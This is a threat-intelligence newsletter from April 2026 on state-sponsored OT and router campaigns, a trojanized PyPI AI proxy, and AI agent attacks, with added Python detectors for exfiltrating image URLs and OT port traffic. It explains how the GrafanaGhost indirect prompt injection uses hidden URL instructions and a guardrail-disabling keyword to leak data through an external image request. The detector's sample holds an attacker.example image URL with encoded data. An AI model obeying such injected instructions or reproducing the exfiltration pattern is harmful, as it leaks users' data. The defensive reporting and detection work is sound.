The Cyber Byte - 9 April 2026

State-sponsored cyber campaigns and novel exploits targeting AI systems represent the most significant threats in this edition. Iranian-affiliated actors are actively disrupting US critical infrastructure by targeting internet-exposed programmable logic controllers, while a Russia-backed espionage network that compromised over 18,000 routers has been neutralized by authorities [5, 6]. Concurrently, emerging threats highlight the growing risk to AI-powered platforms, with vulnerabilities like "GrafanaGhost" enabling silent data exfiltration via indirect prompt injection, and reports indicating a critical security gap from unmanaged non-human identities accessing sensitive corporate data [7, 8]. The attack surface continues to expand with novel side-channel methods, such as acoustic eavesdropping through telecommunication fiber optic cables, demonstrating the persistent evolution of threat vectors [4].

Significant Cyber Incidents and Articles of Interest

  • Iranian APTs Target US Critical Infrastructure PLCs: Iranian-affiliated Advanced Persistent Threat (APT) actors are conducting an ongoing campaign targeting internet-facing Operational Technology (OT) devices across multiple US critical infrastructure sectors, including Water and Wastewater Systems (WWS), Energy, and Government Services [5]. The actors are exploiting programmable logic controllers (PLCs), primarily those from Rockwell Automation/Allen-Bradley, to cause operational disruptions and financial loss by maliciously interacting with project files and manipulating data on Human Machine Interface (HMI) displays [5]. The activity, observed since at least March 2026, involves using overseas-based infrastructure to connect to the PLCs, suggesting the campaign could expand to other OT vendors. This campaign poses an urgent and direct threat to US critical infrastructure, prompting federal agencies to recommend that organizations immediately disconnect PLCs from the internet [5].

  • Russia-Backed Espionage Network Dismantled: An international operation led by the FBI has neutralized a large-scale espionage network attributed to the Russia-backed group Forest Blizzard (APT28) [6]. The campaign compromised over 18,000 routers across more than 120 countries, affecting at least 200 organizations in the military, government, IT, and energy sectors [6]. The actors exploited known vulnerabilities in TP-Link and MikroTik routers to hijack Domain Name System (DNS) settings, enabling them to conduct adversary-in-the-middle attacks to steal credentials, OAuth tokens, and other sensitive data for services like Microsoft Outlook Web Access [6]. While the campaign has reportedly ceased, its scale highlights the significant threat posed by state-sponsored actors leveraging insecure network edge devices as gateways for intelligence gathering [6].

  • GrafanaGhost Vulnerability Enables Silent Data Exfiltration: A critical vulnerability chain named GrafanaGhost was discovered in the data visualization platform Grafana, allowing for silent exfiltration of sensitive business data from instances using AI-based features [8]. Attackers can use an indirect prompt injection by embedding hidden instructions in a Grafana URL. By chaining a protocol-relative URL bypass with a keyword ("INTENT") that disables the AI model's security guardrails, the exploit forces the system to request an external image, leaking sensitive data in the URL request without any user interaction [8]. This exploit demonstrates an emerging attack vector against AI-powered enterprise tools, bypassing both client-side and model-level security controls. Grafana has since released a fix for the vulnerability [8].

  • Malicious PyPI Package "hermes-px" Steals AI Prompts: A malicious Python package named hermes-px, discovered by JFrog security researchers, was found to be masquerading as a secure AI proxy while actively stealing user prompts and exfiltrating them to an attacker-controlled database [1]. The trojanized package hijacks a Tunisian university's private AI endpoint, bundles a stolen and altered Anthropic Claude system prompt, and sanitizes AI responses to conceal its activities. The data exfiltration intentionally bypasses the Tor anonymity the package claims to provide, exposing the user's real IP address and posing a significant supply chain risk to developers and organizations building AI applications [1].

  • Report Warns of Security Gaps from AI Agents and Non-Human Identities: A new report from Keeper Security highlights that non-human identities (NHIs)—such as service accounts, API keys, and AI agents—are creating a major security blind spot for businesses [7]. A survey of cybersecurity experts revealed that nearly half (46%) of companies grant AI tools access to their most sensitive data, yet 76% of these organizations lack consistent privileged access policies to govern these identities. With only 28% of professionals reporting full visibility into their NHIs, this gap is already being exploited, as over 40% of surveyed firms admitted to suffering a security incident involving machine credentials in the past year [7].

  • Acoustic Eavesdropping via Fiber Optic Cables: A recently published paper details a novel side-channel attack capable of eavesdropping on conversations and activities by using standard telecommunication fiber optic cables. The technique leverages a commercially available Distributed Acoustic Sensing (DAS) system to remotely detect sound-induced vibrations in Fiber-to-the-Home (FTTH) installations [4]. To amplify faint, airborne sounds like human speech, the attack utilizes a custom-built but easily camouflaged "Sensory Receptor," a structure with fiber coiled around it, often disguised as a standard fiber optic box. This method is exceptionally stealthy, as it requires no electricity at the target location, emits no RF signals, and is resistant to countermeasures like ultrasonic jammers, posing a significant risk to high-stakes environments such as corporate boardrooms and government facilities [4].

  • AI Agent Traps: Research from Google DeepMind introduces a comprehensive framework for "AI Agent Traps," defining them as adversarial content engineered to exploit autonomous AI agents that interact with web content [2]. The report outlines six categories of attacks that target different stages of an agent's operational cycle: Content Injection (embedding hidden commands), Semantic Manipulation (corrupting reasoning), Cognitive State (poisoning memory or knowledge bases), Behavioural Control (hijacking actions via prompt injection), Systemic Traps (triggering large-scale failures in multi-agent systems), and Human-in-the-Loop Traps (exploiting the human overseer). This research establishes a new attack surface where the information environment itself is weaponized, allowing threat actors to coerce agents into performing unauthorized actions like data exfiltration or illicit transactions by manipulating the content they process [2].
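The following is an added example, not code from Grafana or from the cited research. It checks rendered assistant output for the pattern the GrafanaGhost item above describes: an image reference to an external host, written protocol-relative and carrying encoded data in a URL parameter. The host names, the allowlist and the sample text are constructed, and treating the output as Markdown or HTML is an assumption.

```python
import re
from urllib.parse import urlsplit

# Markdown ![alt](url) and HTML <img src="url"> image references.
IMG_URL = re.compile(r'!\[[^\]]*\]\(\s*([^)\s]+)|<img[^>]+src=["\']?([^"\'\s>]+)', re.I)
# A long base64/base64url/hex-looking parameter value suggests packed data.
ENCODED = re.compile(r'^[A-Za-z0-9+/_=%-]{24,}$')

def flag_image_urls(text, allowed_hosts):
    """Return (url, reasons) for image references that leave the allowlist."""
    findings = []
    for match in IMG_URL.finditer(text):
        url = match.group(1) or match.group(2)
        try:
            parts = urlsplit(url)
        except ValueError:
            findings.append((url, ["unparseable"]))
            continue
        host = (parts.hostname or "").lower()
        if not host or host in allowed_hosts:
            continue  # same-origin relative path or an approved host
        reasons = ["external-host"]
        if url.startswith("//"):
            reasons.append("protocol-relative")
        # Inspect raw values so '+' and '%' survive for the pattern check.
        values = [pair.partition("=")[2] for pair in parts.query.split("&")]
        if any(ENCODED.match(value) for value in values):
            reasons.append("encoded-parameter")
        findings.append((url, reasons))
    return findings

# Constructed sample of rendered assistant output; all hosts are placeholders.
SAMPLE = """\
Dashboard summary:
![logo](/public/img/logo.png)
![chart](https://grafana.corp.example/render/d/abc?width=800)
![status](//collector.attacker.example/p.png?d=cmV2ZW51ZT0xLjJNO2NoYW5uZWw9ZW1lYQ)
<img src="https://cdn.attacker.example/a.gif?id=7">
"""

if __name__ == "__main__":
    for url, reasons in flag_image_urls(SAMPLE, {"grafana.corp.example"}):
        print(", ".join(reasons), "->", url)
```

The same check can be pointed at egress proxy logs by feeding it the requested URLs instead of rendered text.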

Threat Actor Activity

  • Iranian-Affiliated APT Actors (e.g., CyberAv3ngers)

    • Affiliation: Assessed as affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC) [5].

    • Targets: US critical infrastructure, specifically Water and Wastewater Systems (WWS), Energy, and Government Services sectors. Focused on internet-exposed Operational Technology (OT) devices like Rockwell Automation and potentially Siemens PLCs [5].

    • TTPs: Accessing internet-exposed PLCs (T0883); using common OT ports (44818, 2222, 102, 502) for C2 (T0885); deploying Dropbear SSH for remote access (T1219); and manipulating PLC project files and HMI displays to cause disruptions (T1565) [5].

    • Geographic Focus: United States [5].

  • Forest Blizzard (APT28 / Fancy Bear)

    • Affiliation: Attributed to Russia’s Main Intelligence Directorate of the General Staff (GRU) [6].

    • Targets: Opportunistically targets network edge devices (TP-Link, MikroTik routers) to pivot to high-value intelligence targets, including military, government, and critical infrastructure entities [6].

    • TTPs: Exploiting known router vulnerabilities for initial access; hijacking DNS settings to conduct adversary-in-the-middle attacks and steal credentials for services like Microsoft Outlook Web Access [6].

    • Geographic Focus: Global campaign spanning over 120 countries, including the United States [6].

  • hermes-px Package Author

    • Affiliation: Unattributed, operating under the fake entity "EGen Labs" [1].

    • Targets: Python developers, especially those working with AI and Large Language Models [1].

    • TTPs: Distributing a trojanized package on PyPI via social engineering; hijacking third-party infrastructure for its operations; exfiltrating all user prompts and AI responses directly to an external database, bypassing promised anonymity; and using multi-layered obfuscation to evade static analysis [1].

Indicators to Watch

  • Malware and Vulnerabilities

    • Malicious PyPI Package hermes-px: Security teams should scan developer environments for this package and monitor other dependencies for signs of obfuscation or unauthorized network connections [1].

    • GrafanaGhost Exploit: Organizations using Grafana with AI features must ensure they are patched. Monitor for suspicious outbound requests, particularly those using protocol-relative URLs (e.g., //external-domain.com) or containing encoded data in URL parameters [8].

    • Android Vulnerabilities: Patches are being released for a critical Denial of Service vulnerability (CVE-2026-0049) in the Android Framework and a high-severity vulnerability (CVE-2025-48651) affecting StrongBox components from multiple vendors [3].

  • Suspicious Infrastructure and Behavior Patterns

    • OT Network Traffic: Monitor for unusual traffic on OT-related ports (44818, 2222, 102, 502), especially if originating from overseas hosting providers. Alert on unexpected login attempts or connections to PLCs [5].

    • Router Misconfigurations: Monitor for unauthorized changes to DNS settings on network edge devices, a primary TTP of the Forest Blizzard campaign [6].

    • Non-Human Identity Activity: Increase monitoring of service accounts, API keys, and AI agents. Anomalous access patterns or connections from AI tools to sensitive data stores are key indicators of compromise [7].

  • Indicators of Compromise (IOCs)

    • Iranian APT Campaign (PLC Targeting): Organizations should query logs for connections from the following IP addresses, primarily between January 2025 and March 2026 [5]:

    • hermes-px Campaign: Key IOCs to block and monitor include the data exfiltration endpoint hxxps[:]//urlvoelpilswwxkiosey[.]supabase[.]co/rest/v1/requests_log and the abused university API endpoint hxxps[:]//prod[.]universitecentrale[.]net:9443/api/v1/chat/completions/ [1].
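The following is an added example, not taken from the cited advisory. It applies the OT Network Traffic guidance above to flow records, alerting on connections that reach a PLC on the listed ports (44818, 2222, 102, 502) from any source other than an approved engineering workstation. The CSV layout, the subnets and the sample records are constructed assumptions; "external" here only means outside the site's own address space, with no geolocation or hosting-provider lookup.

```python
import csv
import io
import ipaddress

OT_PORTS = {44818, 2222, 102, 502}                   # ports named in the bulletin
SITE_NETS = [ipaddress.ip_network("10.0.0.0/8")]     # assumed internal address space
PLC_NETS = [ipaddress.ip_network("10.20.0.0/24")]    # assumed PLC subnet
ENG_NETS = [ipaddress.ip_network("10.20.1.0/28")]    # assumed engineering workstations

def _within(ip, nets):
    return any(ip in net for net in nets)

def ot_alerts(flow_csv):
    """Return alerts for flows that reach a PLC on an OT port from a
    source that is not an approved engineering workstation."""
    alerts = []
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            ts, action = row["ts"], row["action"]
            src = ipaddress.ip_address(row["src"])
            dst = ipaddress.ip_address(row["dst"])
            dport = int(row["dport"])
        except (KeyError, TypeError, ValueError):
            continue  # skip malformed records rather than abort the run
        if dport not in OT_PORTS or not _within(dst, PLC_NETS):
            continue
        if _within(src, ENG_NETS):
            continue
        alerts.append({
            "ts": ts, "src": str(src), "dst": str(dst), "dport": dport,
            "origin": "internal" if _within(src, SITE_NETS) else "external",
            "reached_plc": action == "allow",
        })
    # External sources first; within each origin, allowed flows before denied.
    alerts.sort(key=lambda a: (a["origin"] != "external", not a["reached_plc"]))
    return alerts

# Constructed flow records; addresses are documentation/private ranges.
SAMPLE_FLOWS = """\
ts,src,dst,dport,action
2026-04-02T03:14:07Z,203.0.113.45,10.20.0.11,44818,allow
2026-04-02T03:14:09Z,10.20.1.5,10.20.0.11,44818,allow
2026-04-02T03:15:30Z,10.30.4.17,10.20.0.12,502,allow
2026-04-02T03:16:02Z,198.51.100.7,10.20.0.11,2222,deny
2026-04-02T03:16:40Z,203.0.113.45,10.20.0.11,443,allow
2026-04-02T03:17:00Z,bad-row,10.20.0.11,102,allow
"""
```

An allowed external flow means the PLC is reachable from the internet, which is the exposure the advisory asks operators to remove; an internal alert points at a host that should not be talking to controllers.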
